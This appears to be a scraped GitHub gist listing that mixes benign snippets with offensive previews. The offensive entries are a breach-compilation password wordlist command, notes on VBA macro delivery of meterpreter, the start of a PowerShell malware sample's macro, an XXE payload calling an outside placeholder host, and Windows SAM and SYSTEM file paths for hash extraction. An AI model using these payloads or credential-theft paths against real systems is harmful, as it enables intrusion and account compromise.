Skip to content

Instantly share code, notes, and snippets.


Dominik Antal galaris

View GitHub Profile
scottlinux / breachcompilation.txt
Created Dec 19, 2017
1.4 billion password breach compilation wordlist
View breachcompilation.txt
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
mgeeky /
Last active Sep 22, 2020
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address:


  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created Oct 23, 2016
PowerShell malware [posted by @JohnLaTwC]
View gist:d0da355e5c21a122866808d37234cd5d
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
View structs_601_18179.h
class AccountObjectSetCheats
bool AutoBattle = false;
AccountobjectSetCheats Type;
int8 SlotLockCheat = 0;
class AccountObjectGetProfile
std::string Filename;
lolzballs /
Created Mar 22, 2015
Hello World Enterprise Edition
public class HelloWorld{
private static HelloWorld instance;
public static void main(String[] args){
Marko-M /
Last active Jun 6, 2019
Magento2 performance toolkit
# Generate sample data and trigger Magento2 performance toolkit jMeter test plan.
rmondello / gist:b933231b1fcc83a7db0b
Created Jan 7, 2015
Exporting (iCloud) Keychain and Safari credentials to a CSV file
View gist:b933231b1fcc83a7db0b

Exporting (iCloud) Keychain and Safari credentials to a CSV file

After my dad died, I wanted to be able to have access any of his online accounts going forward. My dad was a Safari user and used iCloud Keychain to sync his credentials across his devices. I don’t want to have to keep an OS X user account around just to access his accounts, so I wanted to export his credentials to a portable file.

This is the process I used to create a CSV file of his credentials in the format “,user,pass”. This portable format would be pretty easy to import into 1Password or Safari in the future.

The way I went about this isn’t great; it opens up more opportunities for apps to control one’s Mac through Accessibility APIs, it writes plaintext passwords to disk, and it could use some cleaning up. A better approach might leverage the security command line tool that ships with OS X. That said, I found this method to be a fun illustration of what’s possible us

View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
JorgeGT / plotRTL1090.matlab
Last active May 18, 2020
3D visualization of air traffic through RTL-SDR and MATLAB
View plotRTL1090.matlab
%% PlotRTL1090
% 3D visualization of air traffic through RTL-SDR (dump1090) and MATLAB
% Copyright (C) 2014 Jorge Garcia Tiscar
% This program is free software: you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3 of the License, or
% (at your option) any later version (see LICENSE).
%% Initialize
sckalath / windows_blind
Created Jul 14, 2014
Windows Blind Files
View windows_blind
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
You can’t perform that action at this time.